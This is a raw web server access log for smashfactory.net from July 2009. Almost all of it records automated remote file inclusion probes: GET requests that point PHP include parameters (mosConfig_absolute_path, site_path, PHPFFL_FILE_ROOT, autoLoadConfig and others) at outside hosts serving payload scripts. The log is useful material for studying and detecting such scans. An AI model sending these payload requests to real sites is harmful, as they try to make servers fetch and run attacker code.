84.207.17.120 - - [05/Jul/2009:00:29:31 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
84.207.17.120 - - [05/Jul/2009:00:29:31 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
84.207.17.120 - - [05/Jul/2009:00:29:31 -0700] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
84.207.17.120 - - [05/Jul/2009:00:29:33 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
84.207.17.120 - - [05/Jul/2009:00:29:33 -0700] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
84.207.17.120 - - [05/Jul/2009:00:29:33 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
195.34.78.110 - - [05/Jul/2009:00:30:25 -0700] "GET /logs/access.log%20%20//include/bbs.lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
219.94.163.199 - - [05/Jul/2009:00:30:52 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://carding.by.ru/sources/id(trash).txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.smashfactory.net"
219.94.163.199 - - [05/Jul/2009:00:30:53 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://carding.by.ru/sources/id(trash).txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.smashfactory.net"
219.94.163.199 - - [05/Jul/2009:00:30:53 -0700] "GET /include/bbs.lib.inc.php?site_path=http://carding.by.ru/sources/id(trash).txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.smashfactory.net"
84.207.17.120 - - [05/Jul/2009:00:33:18 -0700] "GET /logs/access.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
84.207.17.120 - - [05/Jul/2009:00:33:55 -0700] "GET /logs/access.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
219.94.163.199 - - [05/Jul/2009:00:34:08 -0700] "GET /logs/access.log%20//include/bbs.lib.inc.php?site_path=http://carding.by.ru/sources/id(trash).txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.smashfactory.net"
216.117.128.143 - - [05/Jul/2009:00:34:28 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
216.117.128.143 - - [05/Jul/2009:00:34:28 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
216.117.128.143 - - [05/Jul/2009:00:34:29 -0700] "GET /logs/access_090129.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
217.70.32.2 - - [05/Jul/2009:00:35:21 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
217.70.32.2 - - [05/Jul/2009:00:35:21 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
217.70.32.2 - - [05/Jul/2009:00:35:21 -0700] "GET /logs/access_090129.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
72.55.182.200 - - [05/Jul/2009:00:36:22 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://a22222.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.smashfactory.net"
216.117.128.143 - - [05/Jul/2009:00:36:25 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
216.117.128.143 - - [05/Jul/2009:00:36:25 -0700] "GET /logs/access.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
216.117.128.143 - - [05/Jul/2009:00:36:26 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
59.120.3.108 - - [05/Jul/2009:00:37:11 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.saerohands.com/mall/admin/echo.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "smashfactory.net"
59.120.3.108 - - [05/Jul/2009:00:37:11 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.saerohands.com/mall/admin/echo.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "smashfactory.net"
59.120.3.108 - - [05/Jul/2009:00:37:12 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.saerohands.com/mall/admin/echo.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "smashfactory.net"
217.70.32.2 - - [05/Jul/2009:00:39:00 -0700] "GET /logs/access.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
217.70.32.2 - - [05/Jul/2009:00:39:00 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
217.70.32.2 - - [05/Jul/2009:00:39:00 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
216.117.128.143 - - [05/Jul/2009:00:39:39 -0700] "GET /logs/access.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
217.70.32.2 - - [05/Jul/2009:00:39:54 -0700] "GET /logs/access.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
72.55.182.200 - - [05/Jul/2009:00:40:04 -0700] "GET /logs/access.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://a22222.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.smashfactory.net"
72.55.182.200 - - [05/Jul/2009:00:40:04 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://a22222.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.smashfactory.net"
72.55.182.200 - - [05/Jul/2009:00:40:05 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://a22222.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.smashfactory.net"
72.55.182.200 - - [05/Jul/2009:00:45:47 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://a22222.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "smashfactory.net"
84.207.17.120 - - [05/Jul/2009:00:46:06 -0700] "GET /pop.php?base=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
84.207.17.120 - - [05/Jul/2009:00:46:06 -0700] "GET /logs/pop.php?base=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
84.207.17.120 - - [05/Jul/2009:00:46:06 -0700] "GET /logs/access.log%20%20/pop.php?base=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
84.207.17.120 - - [05/Jul/2009:00:46:26 -0700] "GET /pop.php?base=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
84.207.17.120 - - [05/Jul/2009:00:46:26 -0700] "GET /logs/access.log%20%20/pop.php?base=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
84.207.17.120 - - [05/Jul/2009:00:46:26 -0700] "GET /logs/pop.php?base=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
60.43.229.5 - - [05/Jul/2009:00:48:52 -0700] "GET /logs/include/lib.inc.php?site_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
60.43.229.5 - - [05/Jul/2009:00:48:52 -0700] "GET /include/lib.inc.php?site_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
60.43.229.5 - - [05/Jul/2009:00:48:52 -0700] "GET /logs/access.log%20%20/include/lib.inc.php?site_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
84.207.17.120 - - [05/Jul/2009:00:52:14 -0700] "GET /logs/access.log/pop.php?base=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
70.85.213.106 - - [05/Jul/2009:00:52:30 -0700] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
70.85.213.106 - - [05/Jul/2009:00:52:30 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
84.207.17.120 - - [05/Jul/2009:00:52:31 -0700] "GET /logs/access.log/pop.php?base=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
70.85.213.106 - - [05/Jul/2009:00:52:33 -0700] "GET /logs/access.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
70.85.213.106 - - [05/Jul/2009:00:52:47 -0700] "GET /logs/access.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
70.85.213.106 - - [05/Jul/2009:00:52:47 -0700] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
70.85.213.106 - - [05/Jul/2009:00:52:47 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
70.85.213.106 - - [05/Jul/2009:00:53:02 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
70.85.213.106 - - [05/Jul/2009:00:53:02 -0700] "GET /logs/access.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
70.85.213.106 - - [05/Jul/2009:00:53:06 -0700] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
204.62.55.11 - - [05/Jul/2009:00:53:51 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.smashfactory.net"
204.62.55.11 - - [05/Jul/2009:00:53:52 -0700] "GET /logs HTTP/1.1" 301 96 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.smashfactory.net"
204.62.55.11 - - [05/Jul/2009:00:53:54 -0700] "GET /logs/ HTTP/1.1" 200 1224 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.smashfactory.net"
70.85.213.106 - - [05/Jul/2009:00:54:09 -0700] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
70.85.213.106 - - [05/Jul/2009:00:54:11 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
70.85.213.106 - - [05/Jul/2009:00:54:11 -0700] "GET /logs/access.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
60.43.229.5 - - [05/Jul/2009:00:57:13 -0700] "GET /logs/access.log/include/lib.inc.php?site_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
72.55.182.200 - - [05/Jul/2009:01:00:38 -0700] "GET /logs/access_090129.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://a22222.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "smashfactory.net"
72.55.182.200 - - [05/Jul/2009:01:00:38 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://a22222.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "smashfactory.net"
72.55.182.200 - - [05/Jul/2009:01:00:38 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://a22222.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "smashfactory.net"
121.124.127.34 - - [05/Jul/2009:01:29:19 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.smashfactory.net"
121.124.127.34 - - [05/Jul/2009:01:29:19 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.smashfactory.net"
121.124.127.34 - - [05/Jul/2009:01:29:19 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.smashfactory.net"
70.85.213.106 - - [05/Jul/2009:01:29:20 -0700] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
70.85.213.106 - - [05/Jul/2009:01:29:20 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
70.85.213.106 - - [05/Jul/2009:01:29:20 -0700] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
66.11.230.36 - - [05/Jul/2009:01:33:01 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
66.11.230.36 - - [05/Jul/2009:01:33:01 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
66.11.230.36 - - [05/Jul/2009:01:33:01 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
70.85.213.106 - - [05/Jul/2009:01:33:16 -0700] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
70.85.213.106 - - [05/Jul/2009:01:33:16 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
70.85.213.106 - - [05/Jul/2009:01:33:16 -0700] "GET /logs/access.log%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
119.245.138.143 - - [05/Jul/2009:01:41:17 -0700] "GET /logs/access.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
119.245.138.143 - - [05/Jul/2009:01:41:17 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 200 780 "-" "Mozilla/5.0" "smashfactory.net"
119.245.138.143 - - [05/Jul/2009:01:41:17 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 200 1231 "-" "Mozilla/5.0" "smashfactory.net"
70.32.106.32 - - [05/Jul/2009:01:42:32 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://www.irishia.net/zerocount/vak.sin? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
70.32.106.32 - - [05/Jul/2009:01:42:32 -0700] "GET /logs/access.log%20%20//include/mail.inc.php?skin_board_path=http://www.irishia.net/zerocount/vak.sin? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
70.32.106.32 - - [05/Jul/2009:01:42:32 -0700] "GET /include/mail.inc.php?skin_board_path=http://www.irishia.net/zerocount/vak.sin? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
66.11.230.36 - - [05/Jul/2009:01:42:36 -0700] "GET /appserv/main.php?appserv_root=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
66.11.230.36 - - [05/Jul/2009:01:42:37 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
66.11.230.36 - - [05/Jul/2009:01:42:37 -0700] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
84.51.241.6 - - [05/Jul/2009:01:42:45 -0700] "GET /errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.smashfactory.net"
84.51.241.6 - - [05/Jul/2009:01:42:45 -0700] "GET /logs/access.log//errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.smashfactory.net"
84.51.241.6 - - [05/Jul/2009:01:42:46 -0700] "GET /logs//errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.smashfactory.net"
84.51.241.6 - - [05/Jul/2009:01:42:51 -0700] "GET /logs/access.log//errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.smashfactory.net"
84.51.241.6 - - [05/Jul/2009:01:42:52 -0700] "GET /logs//errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.smashfactory.net"
84.51.241.6 - - [05/Jul/2009:01:42:52 -0700] "GET /errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.smashfactory.net"
119.245.138.143 - - [05/Jul/2009:01:49:34 -0700] "GET /logs/access.log////?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
70.32.106.32 - - [05/Jul/2009:01:50:59 -0700] "GET /logs/access.log//include/mail.inc.php?skin_board_path=http://www.irishia.net/zerocount/vak.sin? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
89.171.190.110 - - [05/Jul/2009:01:53:53 -0700] "GET /logs/access.log//errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.smashfactory.net"
89.171.190.110 - - [05/Jul/2009:01:53:53 -0700] "GET /errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.smashfactory.net"
89.171.190.110 - - [05/Jul/2009:01:53:53 -0700] "GET /logs//errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.smashfactory.net"
65.98.59.178 - - [05/Jul/2009:01:55:22 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.scd-lunjina.org//poll/idsnk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.smashfactory.net"
65.98.59.178 - - [05/Jul/2009:01:55:22 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://www.scd-lunjina.org//poll/idsnk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.smashfactory.net"
65.98.59.178 - - [05/Jul/2009:01:55:22 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.scd-lunjina.org//poll/idsnk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.smashfactory.net"
65.98.59.178 - - [05/Jul/2009:01:57:21 -0700] "GET /logs/access.log%20//include/bbs.lib.inc.php?site_path=http://www.scd-lunjina.org//poll/idsnk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.smashfactory.net"
83.5.174.105 - - [05/Jul/2009:02:17:12 -0700] "GET /_01_YZ_426_Manual.pdf HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727)" "www.smashfactory.net"
211.230.156.161 - - [05/Jul/2009:02:20:34 -0700] "GET /admin/classes/TplLoad.php?=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
211.230.156.161 - - [05/Jul/2009:02:20:34 -0700] "GET /logs//admin/classes/TplLoad.php?=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
211.230.156.161 - - [05/Jul/2009:02:20:34 -0700] "GET /logs/access.log%20%20//admin/classes/TplLoad.php?=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
211.230.156.161 - - [05/Jul/2009:02:32:21 -0700] "GET /admin/classes/TplLoad.php?=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
211.230.156.161 - - [05/Jul/2009:02:32:21 -0700] "GET /logs//admin/classes/TplLoad.php?=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
211.230.156.161 - - [05/Jul/2009:02:32:21 -0700] "GET /logs/access.log%20%20//admin/classes/TplLoad.php?=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
121.124.127.34 - - [05/Jul/2009:02:41:24 -0700] "GET /appserv/main.php?appserv_root=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.smashfactory.net"
121.124.127.34 - - [05/Jul/2009:02:41:24 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.smashfactory.net"
121.124.127.34 - - [05/Jul/2009:02:41:24 -0700] "GET /logs//appserv/main.php?appserv_root=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.smashfactory.net"
195.34.78.110 - - [05/Jul/2009:02:50:43 -0700] "GET /galeria.php?start=0&kategoria=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
195.34.78.110 - - [05/Jul/2009:02:50:43 -0700] "GET /logs//galeria.php?start=0&kategoria=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
195.34.78.110 - - [05/Jul/2009:02:50:43 -0700] "GET /logs/access.log//galeria.php?start=0&kategoria=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
195.34.78.110 - - [05/Jul/2009:02:55:19 -0700] "GET /logs/access.log%20%20//galeria.php?start=0&kategoria=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
121.124.127.34 - - [05/Jul/2009:02:59:47 -0700] "GET /logs//appserv/main.php?appserv_root=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.smashfactory.net"
